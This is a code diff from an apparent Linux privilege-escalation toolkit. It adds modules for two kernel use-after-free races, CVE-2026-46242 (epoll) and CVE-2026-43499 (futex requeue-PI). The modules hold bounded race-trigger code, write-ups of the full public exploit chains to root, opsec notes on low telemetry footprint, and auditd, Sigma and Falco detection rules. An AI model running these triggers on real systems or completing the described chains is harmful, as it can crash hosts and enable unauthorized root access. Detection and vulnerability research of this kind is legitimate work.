fprintf(stderr, "[*] bad_epoll: reconstructed reachability probe — builds "
|
||||
"the epoll race pair and exercises the ep_remove vs __fput "
|
||||
"close window (%d bounded attempts, %ds cap), then stops. "
|
||||
"The cross-cache → struct file control → fdinfo arb-read → "
|
||||
"ROP root-pop is NOT bundled.\n",
|
||||
BEP_RACE_ITERS, BEP_RACE_BUDGET_SECS);
|
||||
|
||||
/* Fork-isolated: a won race frees a live struct eventpoll. On a
|
||||
* KASAN kernel that oopses (contained to the child); on a plain
|
||||
* vulnerable kernel it may corrupt — which is exactly why we bound
|
||||
* the attempt count hard and never reclaim. */
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("[-] fork"); return SKELETONKEY_TEST_ERROR; }
|
||||
|
||||
if (child == 0) {
|
||||
bep_pin_cpu(1);
|
||||
long before = bep_slabinfo_active("eventpoll");
|
||||
if (before < 0) before = bep_slabinfo_active("kmalloc-192");
|
||||
|
||||
time_t deadline = time(NULL) + BEP_RACE_BUDGET_SECS;
|
||||
int done = 0;
|
||||
for (int i = 0; i < BEP_RACE_ITERS && time(NULL) < deadline; i++) {
|
||||
bep_one_attempt();
|
||||
done = i + 1;
|
||||
}
|
||||
|
||||
long after = bep_slabinfo_active("eventpoll");
|
||||
if (after < 0) after = bep_slabinfo_active("kmalloc-192");
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] bad_epoll: %d close-race attempts fired; "
|
||||
"eventpoll/kmalloc-192 active: %ld → %ld\n",
|
||||
done, before, after);
|
||||
_exit(100); /* honest: window exercised, race not driven to a win */
|
||||
}
|
||||
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
if (WIFSIGNALED(status)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] bad_epoll: child died by signal %d — the epoll "
|
||||
"teardown race may have fired (KASAN oops / corruption "
|
||||
"fault). This is the bug, but no root was obtained.\n",
|
||||
WTERMSIG(status));
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (WIFEXITED(status) && WEXITSTATUS(status) == 100) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] bad_epoll: race window exercised (reconstructed "
|
||||
"primitive). Full chain is NOT bundled and the trigger "
|
||||
"is not VM-verified — honest EXPLOIT_FAIL.\n");
|
||||
fprintf(stderr, "[i] bad_epoll: to complete: port the public kernelCTF "
|
||||
"cross-cache reclaim (eventpoll slab → pipe buffers) + "
|
||||
"/proc/self/fdinfo arbitrary read + ROP for "
|
||||
"CVE-2026-46242.\n");
|
||||
}
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] bad_epoll: probe setup failed (child rc=%d)\n",
|
||||
WIFEXITED(status) ? WEXITSTATUS(status) : -1);
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
#else /* !__linux__ */
|
||||
|
||||
static skeletonkey_result_t bad_epoll_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] bad_epoll: Linux-only module (epoll teardown race "
|
||||
"UAF) — not applicable here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t bad_epoll_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr, "[-] bad_epoll: Linux-only module — cannot run here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
#endif /* __linux__ */
|
||||
|
||||
/* ----- Embedded detection rules -----
|
||||
*
|
||||
* Honesty note (see MODULE.md): epoll is one of the most heavily used
|
||||
* kernel interfaces on Earth. epoll_create1 / epoll_ctl / close from an
|
||||
* unprivileged process is the steady-state behaviour of nginx, systemd,
|
||||
* every language runtime's event loop, etc. There is NO clean behavioural
|
||||
* signature for this exploit, and it rarely trips KASAN. These rules are
|
||||
* therefore intentionally weak/structural — the reliable signal is the
|
||||
* post-exploitation privilege transition, not the epoll traffic. Tune
|
||||
* hard or you will drown in false positives.
|
||||
*/
|
||||
static const char bad_epoll_auditd[] =
|
||||
"# Bad Epoll — epoll teardown race UAF (CVE-2026-46242) — auditd rules\n"
|
||||
"# There is no high-fidelity syscall signature: epoll_create1/epoll_ctl\n"
|
||||
"# are ubiquitous and benign. The only reliable smoking gun is an\n"
|
||||
"# unprivileged process transitioning to euid 0 without going through a\n"
|
||||
"# setuid binary. Pair with kernel-log monitoring for KASAN/oops lines.\n"
|
||||
"-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-bad-epoll-priv\n"
|
||||
"-a always,exit -F arch=b64 -S setuid -F a0=0 -F auid>=1000 -F auid!=4294967295 -k skeletonkey-bad-epoll-priv\n";
|
||||
|
||||
static const char bad_epoll_sigma[] =
|
||||
"title: Possible CVE-2026-46242 Bad Epoll teardown race UAF\n"
|
||||
"id: 7c1e9d2a-skeletonkey-bad-epoll\n"
|
||||
"status: experimental\n"
|
||||
"description: |\n"
|
||||
" Bad Epoll (CVE-2026-46242) is a race UAF in fs/eventpoll.c reachable\n"
|
||||
" by any unprivileged user via epoll_create1/epoll_ctl/close. There is\n"
|
||||
" no reliable syscall-level signature — epoll traffic is ubiquitous and\n"
|
||||
" the exploit rarely trips KASAN. This rule keys on the POST-exploitation\n"
|
||||
" tell: a previously-unprivileged process gaining euid 0 with no setuid\n"
|
||||
" execve in its ancestry. Expect false positives from legitimate\n"
|
||||
" privilege-management daemons; correlate with kernel oops/BUG lines.\n"
|
||||
"logsource: {product: linux, service: auditd}\n"
|
||||
"detection:\n"
|
||||
" uid0: {type: 'SYSCALL', syscall: 'setresuid', a0: 0, a1: 0, a2: 0}\n"
|
||||
" unpriv: {auid|expression: '>= 1000'}\n"
|
||||
" condition: uid0 and unpriv\n"
|
||||
"level: medium\n"
|
||||
"tags: [attack.privilege_escalation, attack.t1068, cve.2026.46242]\n";
|
||||
|
||||
static const char bad_epoll_falco[] =
|
||||
"- rule: Unprivileged process gained root, no setuid exec (possible CVE-2026-46242)\n"
|
||||
" desc: |\n"
|
||||
" Bad Epoll (CVE-2026-46242) epoll teardown race UAF has no clean\n"
|
||||
" behavioural signature — epoll syscalls are ubiquitous. This rule\n"
|
||||
" fires on the post-exploitation effect: a non-root process becoming\n"
|
||||
" root outside a setuid binary. False positives: privilege-management\n"
|
||||
" daemons, su/sudo flows (filter those). Correlate with kernel oops.\n"
|
||||
" condition: >\n"
|
||||
" evt.type in (setuid, setresuid) and evt.arg.uid = 0 and\n"
|
||||
" not proc.is_setuid = true and user.uid != 0\n"
|
||||
" output: >\n"
|
||||
" Non-setuid unprivileged->root transition (possible CVE-2026-46242 Bad Epoll)\n"
|
||||
" (user=%user.name proc=%proc.name pid=%proc.pid ppid=%proc.ppid)\n"
|
||||
" priority: WARNING\n"
|
||||
" tags: [process, mitre_privilege_escalation, T1068, cve.2026.46242]\n";
|
||||
|
||||
const struct skeletonkey_module bad_epoll_module = {
|
||||
.name = "bad_epoll",
|
||||
.cve = "CVE-2026-46242",
|
||||
.summary = "epoll ep_remove-vs-__fput teardown race UAF (\"Bad Epoll\") — frees a live struct eventpoll; unprivileged, no userns needed",
|
||||
.family = "eventpoll",
|
||||
.kernel_range = "6.4 <= K < fix (introduced 58c9b016e128 / 6.4); fixed a6dc643c6931 (7.1-rc1), stable backport 7.0.13; 6.6/6.12 LTS backports pending; 6.1 and older not affected",
|
||||
.detect = bad_epoll_detect,
|
||||
.exploit = bad_epoll_exploit,
|
||||
.mitigate = NULL, /* mitigation: upgrade kernel — no unprivileged-userns/CONFIG stopgap applies (epoll needs none) */
|
||||
.cleanup = NULL, /* trigger creates only throwaway epoll fds in a fork-isolated child; no host artifacts */
|
||||
.detect_auditd = bad_epoll_auditd,
|
||||
.detect_sigma = bad_epoll_sigma,
|
||||
.detect_yara = NULL, /* pure in-kernel race — no file artifact to match */
|
||||
.detect_falco = bad_epoll_falco,
|
||||
.opsec_notes = "detect() is a pure kernel-version gate (vulnerable iff >= 6.4 introduced AND below the fix on-branch; stable backport 7.0.13, 7.1+ inherits; 6.1/5.10 not affected) — no userns or CONFIG probe, because epoll is reachable by every unprivileged user. exploit() forks a CPU-pinned child that builds the epoll race pair (a waiter eventpoll watching a target eventpoll) and exercises the ep_remove-vs-__fput concurrent-close window a hard-bounded number of times (48 attempts / 2s), widening it with close(dup()) false-sharing storms, snapshots the eventpoll/kmalloc-192 slab, and returns EXPLOIT_FAIL. It is deliberately UNDER-DRIVEN: it does not grind the race to a win, does not perform the cross-cache reclaim, and does not bundle the /proc/self/fdinfo arbitrary-read + ROP root-pop (per-kernel offsets refused); the trigger is reconstructed from the public kernelCTF PoC, not VM-verified. Telemetry footprint is nearly invisible: a burst of epoll_create1/epoll_ctl/dup/close from one process (indistinguishable from any event-loop program) and, only if the race actually fires on a vulnerable host, a possible KASAN oops or silent corruption (the bug rarely trips KASAN). No persistent files. The reliable detection signal is the post-exploitation euid-0 transition, not the epoll activity — see the shipped rules. Lowest --auto safety rank in the corpus: a kernel race that frees a live struct file is the least predictable thing here.",
|
||||
.arch_support = "x86_64",
|
||||
};
|
||||
|
||||
void skeletonkey_register_bad_epoll(void)
|
||||
{
|
||||
skeletonkey_register(&bad_epoll_module);
|
||||
}
|
||||
@@ -0,0 +1,12 @@
|
||||
/*
|
||||
* bad_epoll_cve_2026_46242 — SKELETONKEY module registry hook
|
||||
*/
|
||||
|
||||
#ifndef BAD_EPOLL_SKELETONKEY_MODULES_H
|
||||
#define BAD_EPOLL_SKELETONKEY_MODULES_H
|
||||
|
||||
#include "../../core/module.h"
|
||||
|
||||
extern const struct skeletonkey_module bad_epoll_module;
|
||||
|
||||
#endif
|
||||
@@ -0,0 +1,123 @@
|
||||
# ghostlock — CVE-2026-43499
|
||||
|
||||
"GhostLock" — a race-condition use-after-free on **kernel stack** memory in
|
||||
the Linux rtmutex / futex requeue-PI code path (`kernel/locking/rtmutex.c`),
|
||||
reachable by **any unprivileged local user** (CVSS PR:L). No user namespace,
|
||||
no capability, no special `CONFIG` beyond `CONFIG_FUTEX_PI` (universally
|
||||
enabled). It has existed since PI-futex requeue landed — **~15 years, across
|
||||
every distribution** — which is what makes it remarkable.
|
||||
|
||||
## The bug
|
||||
|
||||
On the deadlock-rollback path, `remove_waiter()` operates on `current`
|
||||
instead of the actual waiter task while unwinding a proxy lock in
|
||||
`rt_mutex_start_proxy_lock()` — reached from `futex_requeue()`. If a
|
||||
concurrent PI-chain priority walk (driven from another CPU via
|
||||
`sched_setattr()`) runs at that instant, `pi_blocked_on` is cleared on the
|
||||
**wrong** task and an on-stack `struct rt_mutex_waiter` is left dangling in a
|
||||
task's waiter / pi tree. When the kernel later rotates that rbtree over the
|
||||
(now-reused) stack frame, the forged node fields become a controlled kernel
|
||||
write → use-after-free.
|
||||
|
||||
The public research + PoC ("IonStack part II: GhostLock", VEGA / Nebula
|
||||
Security) builds the requeue-PI cycle so `FUTEX_CMP_REQUEUE_PI` hits
|
||||
`-EDEADLK` (the rollback) while a sibling-core consumer thread hammers
|
||||
`sched_setattr(SCHED_BATCH)` on the waiter's tid to win the race. A separate
|
||||
full Android/Pixel LPE then forges the on-stack `rt_mutex_waiter` on a leaked
|
||||
kernel page (the "KernelSnitch" futex-bucket timing side channel), overwrites
|
||||
a `struct file` `f_op` → configfs/ashmem arbitrary R/W → pipe physical R/W →
|
||||
cred patch → root. ~**97% stable** on kernelCTF; Google awarded **$92,337**.
|
||||
|
||||
## Affected range
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| Introduced | PI-futex requeue — **2.6.39** (commit `8161239a8bcc`) |
|
||||
| Fixed upstream | commit `3bfdc63936dd` ("rtmutex: Use waiter::task instead of current in remove_waiter()") — merged **7.1-rc1** |
|
||||
| Stable backports | **7.0.4** · 6.18.27 · **6.12.86** (LTS) · **6.6.140** (LTS) · **6.1.175** (LTS) |
|
||||
| Affected, no upstream fix | **5.15.x / 5.10.x / 5.4.x / 4.19.x** (kernel CNA lists no stable fix) |
|
||||
| Not affected | < 2.6.39 (predates PI-futex requeue) |
|
||||
| NVD class | CWE-416 (Use After Free) via CWE-362 (race); CVSS 7.8, PR:L |
|
||||
| CISA KEV | no (brand new) |
|
||||
|
||||
The `kernel_range` table carries one entry per backported branch;
|
||||
`kernel_range_is_patched()` marks any branch strictly newer than all of them
|
||||
(7.1+) patched-via-mainline and everything below the on-branch threshold
|
||||
vulnerable — including the 5.x LTS lines that have no published fix. Extend
|
||||
the table as more branches backport (the drift checker flags them). Source:
|
||||
the Linux kernel CNA record (`git.kernel.org/stable/c/<hash>`), corroborated
|
||||
by the Debian / Ubuntu / SUSE trackers.
|
||||
|
||||
## Trigger / detection
|
||||
|
||||
`detect()` is a **pure version gate** — no active probe, because there is no
|
||||
cheap, safe way to distinguish vulnerable from patched without winning the
|
||||
race. It returns `OK` below 2.6.39 or on a patched kernel, and `VULNERABLE`
|
||||
in range. `CONFIG_FUTEX_PI` is a (near-universal) precondition detect()
|
||||
**assumes** rather than probes; there is no userns / capability precondition
|
||||
(any local user — CVSS PR:L).
|
||||
|
||||
`exploit()` forks an isolated child and runs two phases:
|
||||
|
||||
- **(A) deterministic + safe** — builds the requeue-PI cycle (a waiter
|
||||
holding a "chain" PI-futex and parked in `FUTEX_WAIT_REQUEUE_PI`; an owner
|
||||
holding the "target" PI-futex and blocked on the chain) and fires
|
||||
`FUTEX_CMP_REQUEUE_PI`, confirming the kernel returns **-EDEADLK**. That
|
||||
proves the `remove_waiter()` rollback path — where the bug lives — is
|
||||
reachable here. Without a concurrent priority walk the rollback is the
|
||||
kernel's normal, correct deadlock rejection: it creates no dangling
|
||||
pointer, so this phase is safe on any kernel. *(Validated on real hardware:
|
||||
the cycle returns `-EDEADLK` deterministically.)*
|
||||
- **(B) hard-bounded window exercise** — repeats (A) a small, wall-clock-
|
||||
capped number of times (24 iterations / 2 s) with a sibling-CPU
|
||||
`sched_setattr(SCHED_BATCH)` storm on the waiter's tid, overlapping the
|
||||
priority walk with the rollback (the actual race). Then it stops.
|
||||
|
||||
It is **deliberately under-driven**. A *won* race corrupts the kernel
|
||||
**stack** and drives a near-arbitrary pointer write — near-certain panic on a
|
||||
vulnerable host. So this module does **not** widen the `copy_from_user`
|
||||
window (no memfd / `PUNCH_HOLE`), does **not** spray or reoccupy the freed
|
||||
stack frame, and does **not** bundle the KernelSnitch leak → forged-waiter →
|
||||
fops/configfs/ashmem/pipe R/W → cred-patch chain (Android/Pixel-specific,
|
||||
per-build offsets). The trigger is **reconstructed from the public PoC and is
|
||||
not VM-verified**. It returns `EXPLOIT_FAIL` and never claims root it did not
|
||||
get.
|
||||
|
||||
Because a kernel race that corrupts the stack is the least predictable class
|
||||
in the corpus, `ghostlock` carries the **lowest `--auto` safety rank** (11 —
|
||||
just below `bad_epoll`), so `--auto` only reaches for it after every safer
|
||||
vulnerable module.
|
||||
|
||||
## Detection — better than most kernel races, but read this
|
||||
|
||||
Unlike `bad_epoll` (whose epoll syscalls are indistinguishable from every
|
||||
event loop), GhostLock has a **genuinely distinctive tell**: a futex
|
||||
requeue-PI op (`FUTEX_WAIT_REQUEUE_PI` / `FUTEX_CMP_REQUEUE_PI`) returning
|
||||
`-EDEADLK`, which glibc's requeue-PI usage inside `pthread_cond_wait` never
|
||||
provokes, interleaved with `sched_setattr(SCHED_BATCH)` on a **sibling
|
||||
thread** and `sched_setaffinity` CPU pinning. The catch: auditd/sigma see the
|
||||
`futex` syscall but not its op-vs-return cheaply, and a bare `-S futex` watch
|
||||
would flood any host. So:
|
||||
|
||||
- **auditd / sigma** anchor on the far rarer `sched_setattr` /
|
||||
`sched_setaffinity` drivers plus the post-exploitation euid-0 transition.
|
||||
- **falco / eBPF** carries the high-fidelity rule (futex requeue-PI returns
|
||||
`EDEADLK` + sibling `sched_setattr`) — it can see the op and the return
|
||||
value.
|
||||
|
||||
There is no yara rule (in-kernel race, no file artifact). Tune the
|
||||
`sched_setattr` anchor per environment — real-time and scheduler-tuning
|
||||
daemons will false-positive.
|
||||
|
||||
## Fix / mitigation
|
||||
|
||||
Upgrade the kernel (>= 7.0.4 / 6.12.86 / 6.6.140 / 6.1.175 on-branch, or
|
||||
7.1+). There is **no partial mitigation**: PI futexes cannot be disabled at
|
||||
runtime, and no `unprivileged_userns_clone` / sysctl toggle closes this path.
|
||||
`mitigate()` is `NULL` for that reason.
|
||||
|
||||
## Credit
|
||||
|
||||
Discovery, research, and the public PoC: **VEGA / Nebula Security**
|
||||
(`@nebusecurity`, nebusec.ai). Upstream fix `3bfdc63936dd` (Keenan Dong /
|
||||
Thomas Gleixner). See `NOTICE.md`.
|
||||
@@ -0,0 +1,76 @@
|
||||
# NOTICE — ghostlock (CVE-2026-43499)
|
||||
|
||||
## Vulnerability
|
||||
|
||||
**CVE-2026-43499** — "GhostLock", a **race-condition use-after-free** on
|
||||
kernel **stack** memory in the Linux rtmutex / futex requeue-PI path
|
||||
(`kernel/locking/rtmutex.c`). On the deadlock-rollback path,
|
||||
`remove_waiter()` operates on `current` instead of the actual waiter task
|
||||
while unwinding a proxy lock in `rt_mutex_start_proxy_lock()` (reached from
|
||||
`futex_requeue()`); a concurrent PI-chain priority walk driven via
|
||||
`sched_setattr()` on another CPU clears `pi_blocked_on` on the wrong task and
|
||||
leaves an on-stack `struct rt_mutex_waiter` dangling → UAF when the kernel
|
||||
later rotates the rbtree over the reused stack frame.
|
||||
|
||||
The bug is reachable by **any unprivileged local user** (CVSS 7.8, PR:L) —
|
||||
`futex(2)` + `sched_setattr(2)`, no capability, no user namespace, no special
|
||||
config beyond `CONFIG_FUTEX_PI` (universally enabled). It has existed since
|
||||
PI-futex requeue landed in **2.6.39** — ~15 years across every distribution.
|
||||
NVD class: **CWE-416** (Use After Free), with a **CWE-362** race root cause.
|
||||
**Not** in CISA KEV (brand new).
|
||||
|
||||
## Research credit
|
||||
|
||||
- **Discovery, research, and public PoC** by **VEGA / Nebula Security**
|
||||
(`@nebusecurity`, <https://nebusec.ai>), published as "IonStack part II:
|
||||
GhostLock" (<https://nebusec.ai/research/ionstack-part-2/>). Exploit code:
|
||||
<https://github.com/NebuSec/CyberMeowfia> (`IonStack/CVE-2026-43499`,
|
||||
Apache-2.0). Awarded **$92,337** in Google's kernelCTF for a ~97%-stable
|
||||
privilege escalation / container escape. SKELETONKEY's trigger
|
||||
reconstruction is informed by the public PoC's requeue-PI cycle shape only
|
||||
— no KernelSnitch offsets, forged-waiter field layout, or ROP / cred-patch
|
||||
arithmetic is reused.
|
||||
- **Introduced** with PI-futex requeue in **2.6.39** (commit
|
||||
`8161239a8bcc`).
|
||||
- **Fixed upstream** by commit
|
||||
`3bfdc63936dd4773109b7b8c280c0f3b5ae7d349` ("rtmutex: Use waiter::task
|
||||
instead of current in remove_waiter()", Keenan Dong / Thomas Gleixner),
|
||||
merged for **7.1-rc1**; stable backports **7.0.4 / 6.18.27 / 6.12.86 /
|
||||
6.6.140 / 6.1.175**.
|
||||
- Authoritative backport versions: the Linux kernel CNA record
|
||||
(<https://cveawg.mitre.org/api/cve/CVE-2026-43499>,
|
||||
`git.kernel.org/stable/c/<hash>`), corroborated by the Debian
|
||||
(<https://security-tracker.debian.org/tracker/CVE-2026-43499>), Ubuntu, and
|
||||
SUSE trackers. The **5.15 / 5.10 / 5.4 / 4.19** LTS branches are affected
|
||||
with no upstream stable fix published at time of writing.
|
||||
|
||||
All credit for finding, analysing, and exploiting this bug belongs to VEGA /
|
||||
Nebula Security and to the upstream maintainers who fixed it. SKELETONKEY is
|
||||
the bundling and bookkeeping layer only.
|
||||
|
||||
## SKELETONKEY role
|
||||
|
||||
🟡 **Trigger (reconstructed) — reachability-only, not VM-verified.** This is
|
||||
the corpus's first rtmutex / futex-PI module and its cleanest example of a
|
||||
kernel-**stack** UAF (every other UAF in the corpus is heap/slab). Shipped on
|
||||
the same "fire the bug class and stop" contract as `stackrot`
|
||||
(CVE-2023-3269), `nft_catchall` (CVE-2026-23111), and `bad_epoll`
|
||||
(CVE-2026-46242).
|
||||
|
||||
`detect()` is a pure kernel-version gate (vulnerable iff `>= 2.6.39` and below
|
||||
the on-branch fix; backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175,
|
||||
7.1+ inherits mainline; 5.15/5.10/5.4/4.19 affected with no upstream fix) — no
|
||||
userns or CONFIG probe (`CONFIG_FUTEX_PI` assumed, near-universal).
|
||||
`exploit()` forks an isolated child that confirms the `-EDEADLK`
|
||||
`remove_waiter()` rollback path is reachable (deterministic, safe) and then
|
||||
exercises the actual race a hard-bounded 24 iterations / 2 s with a
|
||||
sibling-CPU `sched_setattr(SCHED_BATCH)` storm, and stops.
|
||||
|
||||
It is **deliberately under-driven**: a won race corrupts the kernel stack and
|
||||
drives a near-arbitrary pointer write (near-certain panic), so the module does
|
||||
not widen the `copy_from_user` window, does not spray/reoccupy the freed
|
||||
frame, and does not bundle the KernelSnitch leak → forged on-stack
|
||||
`rt_mutex_waiter` → fops/configfs/ashmem/pipe R/W → cred-patch root-pop
|
||||
(Android/Pixel-specific, per-build offsets). The trigger is reconstructed from
|
||||
the public PoC, not VM-verified — it never claims root it did not get. It
|
||||
carries the lowest `--auto` safety rank in the corpus.
|
||||
@@ -0,0 +1,567 @@
|
||||
/*
|
||||
* ghostlock_cve_2026_43499 — SKELETONKEY module
|
||||
*
|
||||
* CVE-2026-43499 — "GhostLock", a race-condition use-after-free on kernel
|
||||
* STACK memory in the Linux rtmutex / futex requeue-PI code path
|
||||
* (kernel/locking/rtmutex.c). On the deadlock-rollback path,
|
||||
* remove_waiter() operates on `current` instead of the actual waiter task
|
||||
* while unwinding a proxy lock in rt_mutex_start_proxy_lock() — reached
|
||||
* from futex_requeue(). If a concurrent PI-chain priority walk (driven
|
||||
* from another CPU via sched_setattr()) runs at that instant,
|
||||
* `pi_blocked_on` is cleared on the WRONG task and an on-stack
|
||||
* `struct rt_mutex_waiter` is left dangling in a task's waiter / pi tree.
|
||||
* When the kernel later rotates that rbtree over the (now-reused) stack
|
||||
* frame, the forged node fields become a controlled kernel write → UAF.
|
||||
* Reachable by ANY unprivileged local user (CVSS PR:L): plain futex(2) +
|
||||
* sched_setattr(2), no user namespace, no capability, no special CONFIG
|
||||
* beyond CONFIG_FUTEX_PI (universally enabled). The bug has existed since
|
||||
* PI-futex requeue landed — ~15 years, across every distribution.
|
||||
*
|
||||
* Public research + PoC — "IonStack part II: GhostLock" by VEGA / Nebula
|
||||
* Security (https://nebusec.ai/research/ionstack-part-2/; code at
|
||||
* https://github.com/NebuSec/CyberMeowfia, Apache-2.0). A portable crash
|
||||
* PoC drives the -EDEADLK rollback while a sibling-core consumer thread
|
||||
* fires sched_setattr(SCHED_BATCH) to win the race; a separate full
|
||||
* Android/Pixel LPE then forges the on-stack rt_mutex_waiter on a leaked
|
||||
* kernel page (the "KernelSnitch" futex-bucket timing side channel),
|
||||
* overwrites a struct file f_op → configfs/ashmem arbitrary R/W → pipe
|
||||
* physical R/W → cred patch → root. ~97% stable on kernelCTF; Google
|
||||
* awarded $92,337.
|
||||
*
|
||||
* CWE-416 (Use After Free) via CWE-362 (race). CVSS 7.8 (PR:L). Introduced
|
||||
* ~2.6.39 (PI-futex requeue); fixed by commit 3bfdc63936dd ("rtmutex: Use
|
||||
* waiter::task instead of current in remove_waiter()") merged for 7.1-rc1;
|
||||
* stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175. The
|
||||
* 5.15 / 5.10 / 5.4 / 4.19 LTS branches are AFFECTED with no upstream
|
||||
* stable fix published at time of writing. NOT in CISA KEV (brand new).
|
||||
*
|
||||
* STATUS: 🟡 TRIGGER (reconstructed) — reachability-only, NOT VM-verified.
|
||||
* exploit() forks an isolated child that, in two phases:
|
||||
* (A) DETERMINISTIC + SAFE — builds the requeue-PI cycle (a waiter
|
||||
* holding a "chain" PI-futex and parked in FUTEX_WAIT_REQUEUE_PI;
|
||||
* an owner holding the "target" PI-futex and blocked on the chain)
|
||||
* and fires FUTEX_CMP_REQUEUE_PI, confirming the kernel returns
|
||||
* -EDEADLK. That -EDEADLK proves the remove_waiter() deadlock-
|
||||
* rollback path (where the bug lives) is REACHABLE on this host.
|
||||
* With no concurrent priority walk, the rollback is the kernel's
|
||||
* normal, correct deadlock rejection — it creates no dangling
|
||||
* pointer, so this phase is safe on any kernel.
|
||||
* (B) HARD-BOUNDED window exercise — repeats (A) a small, wall-clock-
|
||||
* capped number of times with a sibling-core consumer thread
|
||||
* hammering sched_setattr(SCHED_BATCH) on the waiter's tid, so the
|
||||
* PI-chain priority walk overlaps the rollback (the actual race).
|
||||
* Then it STOPS. It deliberately OMITS the memfd/PUNCH_HOLE
|
||||
* copy_from_user widening and the kernel-stack spray that make a
|
||||
* win likely, does NOT reoccupy the freed frame, and does NOT
|
||||
* bundle the KernelSnitch leak → forged-waiter → fops/configfs/
|
||||
* ashmem/pipe R/W → cred-patch chain (Android/Pixel-specific,
|
||||
* per-build offsets). It returns EXPLOIT_FAIL and never claims
|
||||
* root it did not get.
|
||||
* A *won* race here corrupts the kernel STACK and drives a near-arbitrary
|
||||
* pointer write — near-certain panic on a vulnerable host — which is why
|
||||
* this carries the lowest --auto safety rank in the corpus (see
|
||||
* module_safety_rank() in skeletonkey.c).
|
||||
*
|
||||
* detect() is a pure version gate: vulnerable iff the running kernel is
|
||||
* >= 2.6.39 (when PI-futex requeue arrived) AND below the fix on its
|
||||
* branch. CONFIG_FUTEX_PI is a (near-universal) precondition that
|
||||
* detect() ASSUMES rather than probes — no distro tracker publishes a
|
||||
* CONFIG gate and /proc/config.gz is often absent; there is likewise no
|
||||
* userns / capability precondition (CVSS PR:L, any local user).
|
||||
*
|
||||
* arch_support: any — the bug and this reachability probe are arch-neutral
|
||||
* (futex / sched_setattr / pthreads); only the public *weaponization* is
|
||||
* arm64/Android-specific, and none of it is bundled here.
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
#include "../../core/registry.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#ifdef __linux__
|
||||
|
||||
#include "../../core/kernel_range.h"
|
||||
#include "../../core/host.h"
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stdatomic.h>
|
||||
#include <errno.h>
|
||||
#include <time.h>
|
||||
#include <sched.h>
|
||||
#include <pthread.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/syscall.h>
|
||||
|
||||
/* futex operation constants — define defensively; <linux/futex.h> is not
|
||||
* always present and can clash with libc headers. */
|
||||
#ifndef FUTEX_LOCK_PI
|
||||
#define FUTEX_LOCK_PI 6
|
||||
#endif
|
||||
#ifndef FUTEX_UNLOCK_PI
|
||||
#define FUTEX_UNLOCK_PI 7
|
||||
#endif
|
||||
#ifndef FUTEX_WAIT_REQUEUE_PI
|
||||
#define FUTEX_WAIT_REQUEUE_PI 11
|
||||
#endif
|
||||
#ifndef FUTEX_CMP_REQUEUE_PI
|
||||
#define FUTEX_CMP_REQUEUE_PI 12
|
||||
#endif
|
||||
#ifndef FUTEX_CLOCK_REALTIME
|
||||
#define FUTEX_CLOCK_REALTIME 256
|
||||
#endif
|
||||
#ifndef SCHED_BATCH
|
||||
#define SCHED_BATCH 3
|
||||
#endif
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Kernel-range table. Mainline fix landed in 7.1-rc1 (3bfdc63936dd);
|
||||
* stable backports shipped per LTS branch below. A branch with an exact
|
||||
* entry is patched iff host.patch >= entry.patch; any branch strictly
|
||||
* newer than EVERY entry (i.e. 7.1+) is patched-via-mainline; every other
|
||||
* branch (5.4/5.10/5.15 — affected, no upstream fix — and the EOL lines
|
||||
* 6.2..6.5 / 6.7..6.11 / 6.13..6.17 / 6.19 / 7.0.<4) is still vulnerable.
|
||||
* kernel_range_is_patched() implements exactly that. Extend the table as
|
||||
* more branches publish backports (the drift checker flags them).
|
||||
* Authoritative source: the Linux kernel CNA record (git.kernel.org
|
||||
* /stable/c/<hash>), corroborated by Debian/Ubuntu/SUSE trackers.
|
||||
* ------------------------------------------------------------------ */
|
||||
static const struct kernel_patched_from ghostlock_patched_branches[] = {
|
||||
{6, 1, 175}, /* 6.1 LTS — d8cce4773c2b */
|
||||
{6, 6, 140}, /* 6.6 LTS — 8a1fc8d698ac */
|
||||
{6, 12, 86}, /* 6.12 LTS — 6d52dfcb2a5d */
|
||||
{6, 18, 27}, /* 6.18 — 3fb7394a8377 */
|
||||
{7, 0, 4}, /* 7.0 — 88614876370a; 7.1+ inherits the mainline fix */
|
||||
};
|
||||
|
||||
static const struct kernel_range ghostlock_range = {
|
||||
.patched_from = ghostlock_patched_branches,
|
||||
.n_patched_from = sizeof(ghostlock_patched_branches) /
|
||||
sizeof(ghostlock_patched_branches[0]),
|
||||
};
|
||||
|
||||
static skeletonkey_result_t ghostlock_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
|
||||
if (!v || v->major == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] ghostlock: host fingerprint missing kernel "
|
||||
"version — bailing\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* PI-futex requeue (and thus the vulnerable rt_mutex_start_proxy_lock
|
||||
* / remove_waiter rollback) arrived in 2.6.39; older kernels predate
|
||||
